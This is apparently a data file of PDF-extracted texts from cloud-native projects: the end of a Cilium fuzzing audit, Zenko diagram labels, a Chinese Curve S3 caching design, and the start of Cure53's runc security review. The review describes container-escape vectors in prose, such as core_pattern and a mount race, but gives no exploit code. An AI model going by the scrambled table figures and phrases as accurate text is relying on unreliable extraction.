(hours)\nFuzzLabelsfilterPkg280,380,1081,332.7\nFuzzDecodeTraceNotify69,256,225,2594,816.5\nFuzzFormatEvent63,743,550129\nFuzzPayloadEncodeDecode1,689,825245.2\nFuzzElfOpen72,033,696224.2\nFuzzElfWrite28,824,726135\nFuzzMatchpatternValidate9,814,975,4565,146\nFuzzMatchpatternValidateWithoutCache1,250,359,4777,492\nFuzzParserDecode59,149,192,0956,927.5\nFuzzLabelsParse2,607,448,95513,693.5\nFuzzMultipleParsers74,5246.9\nFuzzConfigParse1,194,473,6236,805.3\nFuzzNewVisibilityPolicy8,817,227,3903,379.4\nFuzzBpf205,251,06912.8\n3\nAs per 6th December 2022.\n19Cilium Fuzzing Audit, 2022\nConclusions and future work\nThis fuzzing audit added 14 fuzzers to the Cilium projects. A total of 8 issues were found\nand at the time of this writing 5 of these issues have been fixed where 3 of the issues are\ndeclared WontFix. The fuzzers were added to Ciliums OSS-Fuzz integration, so that they\ncontinue to test Cilium for hard-to-find bugs as well as new code. OSS-Fuzz will\nperiodically pull the latest master of Cilium and run the fuzzers against that version of the\nsource tree.\nAs this fuzzing audit concludes, it is important to highlight that fuzzing is a continuous\neffort and that the fuzzers should continue to run through Ciliums OSS-Fuzz integration.\nSome bugs may take a long time to find, and to allow the fuzzers to get deep into the code\nbase, and it is imperative that the fuzzers keep running for that purpose.\nFor future work we recommend the following activities to the Cilium team:\nImprove Ciliums testability:\nIt may happen that some\nfuzzers find false positives that\ntheoretically are bugs but cannot be triggered in any execution path to the part of the code\nwhere the crash occurs. This was the case with issue #8 of this fuzzing audit that sparked a\ndiscussion about what to do in these cases for Cilium. An excellent point was made by\nCilium maintainer Joe Stringer who argued that false positives may be a sign that Cilium\nshould improve its testability:\nhttps://github.com/cilium/cilium/pull/20446#discussion_r919120926\n.\nThis is a great\nobservation that also highlights the importance of continuity in fuzzing; Some crashes\nrequired multiple development iterations of both fuzzers and the code base itself in order\nto fully utilize the capabilities of fuzzing, and continuously improving both sides is\nimportant.\nImprove coverage\n: We recommend making it a continuous\neffort to identify missing test\ncoverage of the fuzzers. This can be done using the code coverage visualisations provided\nby OSS-Fuzz.\nRequire fuzzers for new code:\nThe Cilium community\ndoes a good job in adding unit tests\nto new code contributions, and we recommend that Cilium makes a policy out of adding\nfuzzers in addition to unit tests. The overhead for writing fuzzers in addition to unit tests in\nGo is low, since Go has its own fuzzing engine that makes writing unit tests and fuzzers a\nsimilar experience:\nhttps://go.dev/security/fuzz/\n.\n20" } ]
{ "category": "Runtime", "file_name": "XDM_arch_NoNFS.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "GUICloudServer/\nBlobserverAWS\nGCP\nAzureS3C/RINGXDM\nClientBucket & Object \nNamespace\nMongoDBClouds( d a t a a n d\nm e t a d a t a )CLI" } ]
{ "category": "Runtime", "file_name": "XDM_hi-level.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "GUI\nCLIXDMAWS\nGCP\nAzureRING\nGCP XML APIS3 API\nAzure Storage APIS3 API\nS3 API" } ]
{ "category": "Runtime", "file_name": "Curve支持S3数据缓存方案.pdf", "project_name": "Curve", "subcategory": "Cloud Native Storage" }
[ { "data": "© XXX Page 1 of 11Curve支持S3 数据缓存方案© XXX Page 2 of 11版本时间 修改者 修改内容\n1.02021/8/18 胡遥 初稿\n2.02022/8/4 胡遥 根据当前代码实现进行文档更新\n背景\n整体设计\n缓存设计\n文件到s3对象映射\n元数据采用2层索引\n对象名设计\n读写缓存分离\n对外接口\n后台刷数据线程\n本地磁盘缓存\n关键数据结构\n详细设计\nWrite流程\nRead流程\nReleaseCache流程\nFlush流程\nFsSync流程\n后台流程\n背景\n基于s3的daemon版本基于基本的性能测试发现性能非常差。具体数据如下:\n通过日志初步分析有2点原因© XXX Page 3 of 11\n1.append接口目前采用先从s3 get,在内存中合并完后再put的方式,对s3操作过多\n2.对于4k 小io每次都要和s3交互,导致性能非常差。\n因此需要通过Cache模块解决以上2个问题。\n整体设计\n整个dataCache的设计思路包括:\n1.为了快速查询到对应的缓存,整个缓存分为3层file->chunk->datacache。\n2.整个文件到s3对象的映射分为4层,file->chunk->datacach->block。\n3.文件对应s3元数据采用2层索引。\n缓存设计\n从上面的整体架构图来看,整个缓存分为3层,file->chunk->datacache 3层,通过inodeId找到file,通过offset计算出chunkindex找到chunk,然后通过offset~len找到是否有合适的datacache或者new© XXX Page 4 of 11datacache。\n这里FileCacheManager,ChunkCacheManager维护的缓存主要都是一张map表,只有真正到了dataCache这一层才涉及到真正的数据。\n这里对chunk,block的概念在详细说明一下,当文件系统创建的时候会指定chunkSize,blockSize,这个时候chunk和block的大小就固定了,不可修改。因此一个文件的chunk和block也是固定的,任意一个offset\n的访问都可以通过这2个值计算到属于那个chunk,以及chunk内属于哪个block。注意这里block不是全局的index,而是chunk内的index(好像用全局的blockindex也是没问题的)\n早期的datacache设计的是连续的内存,但是连续的内存在多个dataCache的合并上会有大内存的申请和释放,耗时较大。目前已经采用page的方式存储在datacache中,每个page是64k,这样在datacache合并的时\n候只需要分配少量的内存,或者是对page的迁移就能达到合并的效果。所以datacache逻辑上是对应一段连续的file data,但是在内存中实际上是由许多不连续的page组成。\n文件到s3对象映射\n整个文件到s3对象的映射分为4层:file,chunk,datacache,block。file是由固定大小的chunk组成,chunk是由变长且连续的datacache组成,datacache是由固定大小的block组成。所有datacache(这里指的是\n写datacache)没有交集(因为如果有,在write流程中就合并了,没有合并的必然是没有交集的)。\n在datacache flush的流程中,将数据写到s3上。考虑到datacache是连续的变长数据,而我们写到s3上是固定大小的对象,所以引入了block的概念。因此会根据datacache对应的chunk的便宜pos,计算block\nindex,从而构成对象名,写到s3上。\n元数据采用2层索引\n由于chunk大小是固定的(默认64M),所以Inode中采用map<uint64, S3ChunkInfoList>\ns3ChunkInfoMap用于保存对象存储的位置信息。采用2级索引的好处是,根据操作的offset可以快速定位到index,则只需要遍历index相关的S3ChunkInfoList,减少了遍历的范围。\n对象名设计\n对象名采用fsid+inodeId+chunkId+blockindex+compaction(后台碎片整理才会使用,默认0)+inodeId。增加inodeId的目的是为了后续从对象存储上遍历,反查文件,这里就要求inodeId是永远不可重复。\n读写缓存分离© XXX Page 5 of 11读写缓存的设计采用的是读写缓存分离的方案。写缓存一旦flush即释放,读缓存采用可设置的策略进行淘汰(默认LRU),对于小io进行block级别的预读。这里读缓存的产生会有2种场景,第1是用户读请求s3产\n生的数据会加入到读缓存中,第2是写flush后的datacache会转化为读缓存。这里有一种情况,读缓存在新增datacache的时候,可能和老的读缓存会有重叠的部分,这种情况肯定是以新加入的读缓存为主,将老的\n读缓存删除掉\n对外接口\n流程上对于读写缓存有影响的接口包括:Write,Read,ReleaseCache,Flush,Fssync,Truncate,增对cto场景又增加了FlushAllCache。后面会详细介绍这些接口流程。\n后台刷数据线程\n启动后台线程,将写Cache定时刷到S3上,同时通过inodeManager更新inode缓存中的s3InfoList。具体细节见\n本地磁盘缓存\n如果有配置writeBack dev,则会调用diskStroage进行本地磁盘write,最终写到s3则由diskStroage模块决定。\n关键数据结构\nmessage S3ChunkInfo {\n required uint64 chunkId = 1;\n required uint64 compaction = 2;\n required uint64 offset = 3;\n required uint64 len = 4; // file logic length\n required uint64 size = 5; // file size in object storage\n required uint64 zero = 6;\n};\nmessage Inode {\n required uint64 inodeId = 1;\n required uint32 fsId = 2;\n required uint64 length = 3;\n required uint32 ctime = 4;\n required uint32 mtime = 5;\n required uint32 atime = 6;\n required uint32 uid = 7;\n required uint32 gid = 8;\n required uint32 mode = 9;\n required sint32 nlink = 10;\n required FsFileType type = 11;\n optional string symlink = 12; // TYPE_SYM_LINK only© XXX Page 6 of 11 optional VolumeExtentList volumeExtentList = 13; // TYPE_FILE only\n map<uint64, S3ChunkInfoList> s3ChunkInfoMap = 14; // TYPE_S3 only, first is chunk index\n optional uint64 version = 15;\n}\nclass ClientS3Adaptor {\n public:\n ClientS3Adaptor () {}\n void Init(const S3ClientAdaptorOption option, S3Client *client,\n std::shared_ptr inodeManager);\n int Write(Inode *inode, uint64_t offset,\n uint64_t length, const char* buf bool di);\n int Read(Inode *inode, uint64_t offset,\n uint64_t length, char* buf);\n int ReleaseCache(uint64_t inodeId);\n int Flush(Inode *inode);\n int FsSync();\n uint64_t GetBlockSize() {return blockSize_;}\n uint64_t GetChunkSize() {return chunkSize_;}\n CURVEFS_ERROR AllocS3ChunkId(uint32_t fsId);\n CURVEFS_ERROR GetInode(uint64_t inodeId, Inode *out);\nprivate:\n S3Client *client_;\n uint64_t blockSize_;\n uint64_t chunkSize_;\n std::string metaServerEps_;\n std::string allocateServerEps_;\n Thread bgFlushThread_;\n std::atomic toStop_;\n std::shared_ptr fsCacheManager_;\n std::shared_ptr inodeManager_;\n};\nclass S3ClientAdaptor;\nclass ChunkCacheManager;\nclass FileCacheManager;\nclass FsCacheManager;© XXX Page 7 of 11using FileCacheManagerPtr = std::shared_ptr;\nusing ChunkCacheManagerPtr = std::shared_ptr;\nusing DataCachePtr = std::shared_ptr;\nclass FsCacheManager {\n public:\n FsCacheManager() {}\n FileCacheManagerPtr FindFileCacheManager(uint32_t fsId, uint64_t inodeId);\n void ReleaseFileCahcheManager(uint32_t fdId, uint64_t inodeId);\n FileCacheManagerPtr GetNextFileCacheManager();\n void InitMapIter();\n bool FsCacheManagerIsEmpty();\n private:\n std::unordered_map fileCacheManagerMap_; // first is inodeid\n std::unordered_map ::iterator fileCacheManagerMapIter_;\n RWLock rwLock_;\n std::list lruReadDataCacheList;\n uint64_t lruMaxSize;\n std::atomic dataCacheNum_;\n};\nclass FileCacheManager {\n public:\n FileCacheManager(uint32_t fsid, uint64_t inode) : fsId_(fsid), inode_(inode) {}\n ChunkCacheManagerPtr FindChunkCacheManager(uint64_t index);\n void ReleaseChunkCacheManager(uint64_t index);\n void ReleaseCache();\n CURVEFS_ERROR Flush();\n private:\n uint64_t fsId_;\n uint64_t inode_;\n std::map chunkCacheMap_; // first is index \n RWLock rwLock_;\n};\nclass ChunkCacheManager {\n public:\n ChunkCacheManager(uint64_t index) : index_(index) {}\n DataCachePtr NewDataCache(S3ClientAdaptor *s3ClientAdaptor, uint32_t chunkPos, uint32_t len, const char© XXX Page 8 of 11*dataCacheType type);\n DataCachePtr FindWriteableDataCache(uint32_t pos, uint32_t len);\n CURVEFS_ERROR Flush();\n private:\n uint64_t index_;\n std::map dataWCacheMap_; // first is pos in chunk\n curve::common::Mutex wMtx_;\n std::map dataRCacheMap_; // first is pos in chunk \n};\nclass DataCache {\n public:\n DataCache(S3ClientAdaptor *s3ClientAdaptor, ChunkCacheManager* chunkCacheManager, uint32_t chunkPos, uint32_t\nlen, const char *data)\n : s3ClientAdaptor_(s3ClientAdaptor), chunkCacheManager_(chunkCacheManager), chunkPos_(chunkPos),\nlen_(len) {\n data_ = new char[len];\n memcpy(data_, data, len);\n }\n virtual ~DataCache() {\n delete data_;\n data_ = NULL;\n }\n \n void Write(uint32_t cachePos, uint32_t len, const char* data);\n CURVEFS_ERROR Flush();\n private:\n S3ClientAdaptor *s3ClientAdaptor_;\n ChunkCacheManager* chunkCacheManager_;\n uint64_t chunkId;\n uint32_t chunkPos_;© XXX Page 9 of 11 uint32_t len_;\n char* data_; \n};\n详细设计\nWrite流程\n1.流控,如果文件系统已使用的写缓存达到水位,则请求先等待。flush释放后会唤醒继续往下走。\n2.加写锁,根据inode和fsid找到对应的fileCacheManager,如果没有则生成新的fileCacheManager,解锁,调用fileCacheManager的Write函数。\n3.根据请求offset,计算出对应的chunk index和chunkPos。将请求拆分成多个chunk的WriteChunk调用。\n4.在WriteChunk内,根据index找到对应的ChunkCacheManager,加ChunkCacheManager锁,根据请求的chunkPos和len从dataCacheMap中找到一个可写的DataCache:\n4.1 chunkPos~len的区间和当前DataCache有交集(包括刚好是边界的情况)即可写。\n4.2 同时计算后续的多个DataCache是否和chunkPos~len有交集,如果有则一并获取。\n5. 如果有可写的DataCache,则调用Write接口将数据合并到DataCache中; ,加入到ChunkCacheManager的Map中。 如果没有可写的DataCache则new一个\n6.释放ChunkCacheManager锁,返回成功。\nRead流程© XXX Page 10 of 11\n1.根据请求offset,计算出对应的chunk index和chunkPos。将请求拆分成多个chunk的ReadChunk调用。\n2.在ReadChunk内,根据index找到对应的ChunkCacheManager,加ChunkCacheManager读锁,根据请求的chunkPos和len从dataCacheMap中找到一个可读的DataCache。\n2.1 由于做了缓存分离,这个时候一个chunkCacheManager实际上有3种datacache缓存存在:写datacache,flushing\ndatacache,和读datacache,从生成的关系来看,写datacache肯定是最新的数据,其次是flushing datacache,在然后是读\ndatacache。所以用户offset~len查找缓存的顺序是先去写datacache中查找,然后去flushing datacache中查找,最后去读datacache中查找。\n2.2查找的结果又会有存在3种情况:要读的chunkPos~len的区间全部被缓存,部分被缓存,以及无缓存。将缓存部分buf直接copy到接口的buf指针对应的偏移位置,无缓存部分生成requestVer。\n3.遍历requestVer,根据每个request的offset找到inode中对应index的S3ChunkInfoList,根据S3ChunkInfoList构建s3Request,最后生成s3RequestVer,主要在函数GenerateS3Request中实现\n3.1这里新加入了重试机制,一般情况如果s3那边读失败,则对于对象不存在,则需要一直重试,这里有2种\n4.遍历s3Re 接口读取数据。 questVer中request采用异步\n5.等待所有的request返回,更新读缓存,获取返回数据填充readBuf。\nReleaseCache流程\n1.由于删除采用异步的方式,所以对于delete操作仅仅需要释放client的cache缓存。这里同时要保证的一点是:上层确保该文件没有被打开,才能调用该接口,因此不用考虑cache被删除的同时又有人来增加或修\n改\n2.根据inodeId找到对应FileCacheManager ,调用ReleaseCache接口,一层一层将缓存释放。\nFlush流程\n1.根据InodeId找到对应的FileCacheManager,执行Flush函数。\n2.FileCacheManager::Flush处理流程。加写锁,获取FileCacheManager的chunkCacheMap_拷贝到临时变量tmp,解写锁。这里对于chunkCacheManager的flush做了并发异步化的优化,遍历tmp中的ChunkCacheManag\ner列表,将每个chunkCacheManager封装到FlushChunkCacheContext的一个task数组中,\n由线程池来并发处理不同chunkCacheManager的flush。\n3.ChunkCacheManager::Flush的处理流程。\n3.1从写datacache中获取一个datacache赋值给flushingDataCache,并移出写datacache的map中(之前的做法是不移除,但是会出现已经在flush的datacache又合并了新data,导致s3重复数据过多的问题)\n3.2执行flushingDataCache的flush,如果成功则datacache转成读缓存,同时调用ReleaseWriteDataCache,更新写缓存相关计数。如果失败,则分为2种情况,一种是s3写失败,则一直退避方式重试,一种是inod\ne获取不存在,则文件已被删,相关写缓存直接释放。\n4.dataCache::Flush流程。\n4.1从mds上获取全局递增的chunkid来关联该datacache,用于chunkid越大表示该对象对应的数据越新。\n4.2异步的写s3或者diskcache。\n4.3更新对应s3info信息,添加到inode的s3infoList中。© XXX Page 11 of 11FsSync流程\n1.循环获取FileCacheManager,执行Flush函数。\n后台流程\n1.在FsCacheManager中增加一个DataCacheNum_字段,如果该字段为0,表示没有cache需要flush,则线程由条件变量控制处于wait状态。\n2.write流程会对后台线程处于wait状态的情况触发notify唤醒,同时修改DataCacheNum_。\n3.后台执行FsCacheManager::FsSync,最后调用的FileCacheManager::Flush,和flush流程保持一致" } ]
{ "category": "Runtime", "file_name": "Security-Audit.pdf", "project_name": "runc", "subcategory": "Container Runtime" }
[ { "data": " Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nSecurity-Review Report runc 11.-12.2019\nCure53, Dr.-Ing. M. Heiderich, M. Wege, N. Hippert, J. Larsson,\nMSc. D. Weißer, MSc. N. Krein, MSc. F. Fäßler\nIndex\nIntroduction\nScope\nTest Methodology\nPhase 1: General security posture checks\nPhase 2: Manual code auditing\nPhase 1: General security posture checks\nApplication/Service/Project Specifics\nLanguage Specifics\nExternal Libraries & Frameworks\nConfiguration Concerns\nAccess Control\nLogging/Monitoring\nUnit/Regression Testing\nDocumentation\nOrganization/Team/Infrastructure Specifics\nSecurity Contact\nSecurity Fix Handling\nBug Bounty\nBug Tracking & Review Process\nEvaluating the Overall Posture\nPhase 2: Manual code auditing & pentesting\nMounting/Binding and Symlinks\nIdentified Vulnerabilities\nRUN-01-001 Race-condition bypassing masked paths (High)\nConclusions & Verdict\nCure53, Berlin · 12/06/19 1/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIntroduction\n“runc is a CLI tool for spawning and running containers according to the OCI\nspecification.” \nFrom https://github.com/opencontainers/runc\nThis report describes the results of a security assessment and a review of the general\nsecurity posture found on the runc software complex and its surroundings. The project\nwas requested and sponsored by CNCF as a common part of the CNCF project\ngraduation process. Within the frames of well-established cooperation, the project was\nawarded to Cure53, which investigated the runc scope in terms of security processes,\nresponse and infrastructure.\nThe work was carried out by seven members of the Cure53 team in November and\nDecember 2019, with a total budget standing at eighteen person-days. From the star,\nthe work was split into two different phases, with Phase 1 focused on General security\nposture checks and Phase 2 dedicated to Manual code auditing aimed at finding\nimplementation-related issues that can lead to security bugs. Cure53 worked in close\ncollaboration with the runc team and the communications during the engagement took\nplace in a dedicated channel of the Docker Slack workspace. The Cure53 team was\ninvited to join the exchanges in that channel by the maintainers. In general,\ncommunications were productive, yet the scope was very clear and not many questions\nhad to be asked.\nBy coincidence, Cure53 received information about a possible race condition\nvulnerability present in the runc codebase at the time when this assessment was in\nprogress. This unusual opportunity was used to first analyze the alleged issue and\ncreate a working PoC. Secondly, it served as a specific case of a bug initially found by a\nthird-party, giving Cure53 a front-row seat to observing and evaluating the disclosure\nprocess. Perspectives of the original finder and the reaction of the runc team upon\ngetting access to the bug report could be investigated and, thanks to this real-life\nexample of an actual vulnerability spotted by a third party, Cure53 gathered empirical\nevidence on optimizing the process at the runc entities in the future.\nIn the following sections, the report will first present the areas featured in the test’s\nscope in more detail, zooming in on the proposed structure of the two phases delineated\nabove. The report is enriched by Cure53 describing the evaluated areas and explaining\nthe methodology of the executed tests in more detail. The aforementioned accidentally\ncovered real-life issue, together with the relevant PoC and credit for the original finder, is\nthen documented. Cure53 additionally furnishes mitigation advice, so to ascertain that\nCure53, Berlin · 12/06/19 2/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nthe runc team can address this hard-to-find and tricky problem. The report closes with a\nconclusion in which Cure53 summarizes this 2019 project and issues a verdict about the\nsecurity premise of the investigated runc scope.\nScope\n•runc v1.0.0-rc9\n◦runc codebase\n▪https://github.com/opencontainers/runc/tree/master \n▪Commit: 46def4cc4cb7bae86d8c80cedd43e96708218f0a\n◦runc project’s security posture and maturity levels\nTest Methodology\nThe following paragraphs describe the metrics and methodologies used to evaluate the\nsecurity posture of the runc project and codebase. In addition, it includes results for\nindividual areas of the project’s security properties that were either selected by Cure53\nor singled out by other involved parties as needing a closer inspection.\nAs noted in the Introduction, the test was divided into two phases, each fulfilling different\ngoals. In the first phase, the focus was on the general security posture of the code and\nthe project. Furthermore, Cure53 examined the processes that the runc development\nteam has made available for security reports, also as relates disclosure and general\nhardening approaches. In the second phase, the work has shifted to the manual source\ncode review of specific code areas.\nPhase 1: General security posture checks\nIn this component of the assessment, Cure53 looked at the General security posture of\nthe runc project and inspected the overall code quality from a meta-level perspective.\nSome of the indicators taken into account encompassed test coverage, security\nvulnerability disclosure process, approaches to threat modeling and general code\nhardening measures. The sum of observations from across these areas have been used\nto describe the maturity levels of this project at a meta-level, independently of the\nsecurity qualities of the provided code and created binaries.\nLater chapters in this report will dive into the details of the inspected items, justifying\nthese choices and presenting the results in the specific case of the runc software project.\nCure53, Berlin · 12/06/19 3/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nPhase 2: Manual code auditing\nFor this component, Cure53 performed a Small-scale code review and attempted to\nidentify security-relevant areas of the project’s codebase and inspect them for common\nflaws.\nUnlike standard processes in a usual penetration test and code audit, this phase only\ntook a few days. As such, it was a brief rather than an in-depth inspection. It should be\nseen as an initial probing aimed at evaluating whether more thorough code audits should\nbe recommended. The goal was not to reach an extensive coverage but to gain an\nimpression about the overall quality. The completed tasks assist Cure53 in making a\njudgment call as to whether runc needs additional tests and what kinds of tests these\ncould be.\nLater chapters in this report will shed more light on what was being inspected, why and\nwith what implications for the runc software complex.\nPhase 1: General security posture checks\nThis phase is meant to provide a more detailed overview of the runc project’s security\nproperties that are seen as somewhat separate from both the code and the runc\nsoftware itself. To facilitate clear flow and understanding, this section is divided into two\nsubsections, where the first part consists of elements specific to the application and the\nproject. The second part looks at the elements linked more strongly to the\norganizational/team aspect. Lastly, each aspect below is taken into account and an\nevaluation of the overall security posture is based on cross-comparative analysis of all\nobservations and findings.\n•A general high-level code audit was undertaken to arrive at a solid judgment of\nthe entire runc project, in particular with the task of checking for unsafe patterns\nand coding styles.\n•The complete project structure was analyzed; the main call flow was mapped; the\nindividual sub-components were enumerated and the supported platforms were\nchecked.\n•The project’s external and third-party dependencies were cross-checked for\nproblematic components.\n•The provided documentation was examined in order to learn about the provided\nfunctionality and the depth of instructions available to the developer.\n•Relevant runtime- and environment-specifications were examined in connection\nwith the general project solution domain.\nCure53, Berlin · 12/06/19 4/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n•Past vulnerability reports and postings were checked to see in which areas\ncertain errors had previously emerged, also in assessing the likelihood of their\nreappearance.\n•An in-depth static code analysis was carried out to check for applicability of\nautomated measures. The scan results were verified for usability.\n•The project’s maturity was evaluated; specific questions about the software were\ncompiled from a general catalog according to individual applicability.\nApplication/Service/Project Specifics\nIn this section, Cure53 will describe the areas that were inspected to get an impression\non the application-specific aspects that lead to a good security posture, such as choice\nof programming language, selection and oversight of external third-party libraries, as\nwell as other technical aspects like logging, monitoring, test coverage and access\ncontrol.\nLanguage Specifics\nProgramming languages can provide functions that pose an inherent security risk and\ntheir use is either deprecated or discouraged. For example, strcpy() in C has led to many\nsecurity issues in the past and should be avoided altogether. Another example would be\nthe manual construction of SQL queries versus the usage of prepared statements. The\nchoice of language and enforcing the usage of proper API functions are therefore crucial\nfor the overall security of the project.\nrunc is written in Go, which inherently provides memory safety and broadly offers a\nhigher level of security in comparison to e.g. C/C++. This is further underlined by only\nmaking use of the Go’s unsafe package if absolutely necessary, in particular when\ninterfacing with the operating system. The code is written with best practices in mind,\nwhich helps not only with auditing, but also with maintenance. The above indicators\ncontribute to a healthy security posture and seem well-understood and properly spread\nthroughout the runc codebase. Specific examples include:\n•Nesting being avoided by handling errors first;\n•Separating test-cases from code;\n•Documenting all relevant code;\n•Keeping documentation/items concise;\n•Separating independent packages;\n•Avoiding unnecessary repetitions.\nThe usage of unsafe is limited on runc to syscall functionality where unsafe pointers are\nabsolutely required and implementation cannot be achieved otherwise. The unsafe\nCure53, Berlin · 12/06/19 5/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nconstructs are solely used as pointers for return values from prctl() and similar low-level\nsystem calls.\nThough some vendor code containing dangerous-looking marshalling code (see\ncilium/ebpf/marshalers.go ) was identified, those fragments are apparently not actively\nused anywhere in the production codebase.\nExternal Libraries & Frameworks\nWhile external libraries and frameworks can also contain vulnerabilities, it is nonetheless\nbeneficial to rely on sophisticated libraries instead of reinventing the wheel with every\nproject. This is especially true for cryptographic implementations, since those are known\nto be prone to errors.\nrunc makes use of external libraries, therefore avoiding reimplementation of already\nexisting solutions. Since runc is heavily dependent on functionalities that are exposed by\nthe Linux kernel, it makes extensive use of third-party packages like\ngolang.org/x/sys/unix to provide a more portable interface to the underlying operating\nsystem. To safeguard a good alternative for file system interactions, packages like\nfilepath-securejoin are used as well. Generally no concerns were found to be present in\nthe used third-party packages. All appear to be widely recognized by the community and\nappear to be under active development.\nConfiguration Concerns\nComplex and adaptable software systems usually have many variable options which can\nbe configured according to the actually deployed application necessities. While this is a\nvery flexible approach, it also leaves immense room for mistakes. As such, it often\ncreates the need for additional and detailed documentation, in particular when it comes\nto security.\nContainers created with runc can have security pitfalls due to the flexibility of the\nconfigurations. Those pitfalls are not explicitly addressed by the documentation and\nrequire deep knowledge about Linux to even have a general awareness about them.\nExamples for such pitfalls are described in the following paragraphs.\nIn a default setup, runc makes the hosts dmesg output available inside the containers\nunless kernel.dmesg_restrict=1 is set on the host system. It includes information about\nthe kernel, which means that in some cases it might disclose certain details to an\nattacker. This especially holds for an adversary who already has access to a runc\ncontainer and needs more information in order to escape the environment. There is no\nreason why this information should be retrievable from a sealed container. Such\nCure53, Berlin · 12/06/19 6/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \ninformation leaks can easily be prevented by blocking the respective syslog system call\nvia seccomp and this is highly advised.\nThe /proc filesystem is a special virtual filesystem included in Linux. It generally requires\nbeing mounted inside a container because a lot of software relies on it. It is also the\nplace where security settings like AppArmor are applied and files that have direct effect\non the underlying system are exposed. In essence, the /proc/sys/kernel/core_pattern file\ncontrols how core files are handled when a process crashes. It also allows to specify a\ncommand that is executed, thus it could potentially be used to break out of the container.\nThat is why the default config generated by runc spec, as well as configs from Docker\nand podman, specify that paths like /proc/sys need to be remounted as read-only.\nBecause this is not documented, new projects that build upon runc might not be aware\nof this danger and may forget to include the read-only settings. It is recommended to\nfollow up on this issue.\nAnother nuance is shown in RUN-01-001, where the order of mounts can have a large\nsecurity impact. podman mounts shared volumes before the /proc filesystem, enabling\nthe race condition in the first place, even though the Docker configs mount the /proc\nfilesystem first. The proposed revision of the sequence is not a guaranteed fix to the\nunderlying issue, but it does mitigate the specific PoC.\nIt should also be noted that the race condition uses a shared volume, though runc\nconfigs can also define the same rootfs for multiple containers. Using the same rootfs\nallows a race condition independent from the mount order. Implementations such as\nDocker and podman define unique rootfs for each container, and thus do not suffer from\nthis issue. However, a new project using runc might not be aware of the risk in a shared\nrootfs.\nBecause of the described security-relevant issues, It is recommended to provide better\ndefault configuration files and add exhaustive explanations of security considerations to\nthe shipped documentation.\nAccess Control\nWhenever an application needs to perform a privileged action, it is crucial that an access\ncontrol model is in place to ensure that appropriate permissions are present. Further, if\nthe application provides an external interface for interaction purposes, some form of\nseparation and access control may be required.\nrunc has a divided access control model in place, which makes the topic of access\ncontrol rather complex. The framework itself offers a subset of functionality that can be\nconfigured in order to limit access for running containers. The general access control\nCure53, Berlin · 12/06/19 7/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nmodel is shared between the hosts responsible for implementation and runc. By default,\nrunc offers the possibility to run rootless containers as well as build tags, which control\nindividual access for a given container.\nLogging/Monitoring\nHaving a good logging/monitoring system in place allows developers and users to\nidentify potential issues more easily or get an idea of what is going wrong. It can also\nprovide security-relevant information, for example when a verification of a signature fails.\nConsequently, having such a system in place has a positive influence on the project.\nrunc makes use of logrus1, a structured logging system that is compatible with Golang’s\nstandard library logger. Although logrus offers a transparent API that replaces the\nstandard logging functionality, runc explicitly invokes logrus when needed. It would make\nsense to centralize its usage by globally overriding the intrinsic log feature. This is\nbecause then uniform logging could be consistently applied throughout the entire\ncodebase. Despite this rather small point of critique, runc tries to make sure that every\nerror is explicitly caught in log files. This additionally counts for the newly created\ncontainer namespaces and child processes which rely on logpipes. Container events are\nequally treated via the events command line interface. A useful addition, though likely\nhard to implement, would be a mechanism for logging exploitation attempts. Considering\nprevious breakout exploits that abuse vulnerabilities such as CVE-2019-5736, it might\nmake sense to include a warning mechanism that makes administrators aware of\nattackers that try to abuse previous vulnerabilities.\nUnit/Regression Testing\nWhile tests are essential for any project, their importance grows with the scale of the\nendeavor. Especially for large-scale compounds, testing ensures that functionality is not\nbroken by code changes. Further, it generally facilitates the premise where features\nfunction the way they are supposed to. Regression tests also help guarantee that\npreviously disclosed vulnerabilities do not get reintroduced into the codebase. Testing is\ntherefore essential for the overall security of the project.\nA containerized unit- and integration-tester are shipped by runc and can easily be\ninvoked via the package-provided makefile. This speeds up building test environments\nby making sure that necessary environments are present. While integration tests are\ncentralized in runc’s codebase, unit-testing is spread out across a multitude of project\nfiles, thus making it harder to recognize whether specific functionalities are covered by\nunit-testing scripts or not. At the same time, unit-testing looks fine and covers areas\nranging from config parsing to cgroups handling, as well as filesystem tests for\ncontainers. However, regression testing is missing, especially as regards assessment of\n1 https://github.com/sirupsen/logrus\nCure53, Berlin · 12/06/19 8/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nwhether fixes for previously disclosed vulnerabilities remain valid. Despite requiring\nadditional engineering effort, reifying that is highly recommended.\nDocumentation\nGood documentation contributes greatly to the overall state of the project. It can ease\nthe workflow and ensure final quality of the code. For example, having a coding\nguideline which is strictly enforced during the patch review process ensures that the\ncode is readable and can be easily understood by a spectrum of developers. Following\ngood conventions can also reduce the risk of introducing bugs and vulnerabilities to the\ncode.\nThe runc project makes a relatively positive impression as far as the existing\ndocumentation is concerned. While a good amount of information is present, it is\nsomewhat scattered around and makes it hard to obtain a full picture of the software\ncomplex. Thus, it is possible to overlook one or the other documented pitfall. On the one\nhand, it may also be advantageous to get more detailed descriptions of the function of\nthe namespaces and cgroups in relation to runc. On the other hand, highly sensible\ndevelopment principles2 and equally detailed maintainer guidelines3 underline the\nearnest approach the developers are taking.\nOrganization/Team/Infrastructure Specifics\nThis section will describe the areas Cure53 looked at to find out about the security\nqualities of the runc project that cannot be linked to the code and software but rather\nencompass handling of incidents. As such, it tackles the level of preparedness for critical\nbug reports within the runc development team. In addition, Cure53 also investigated 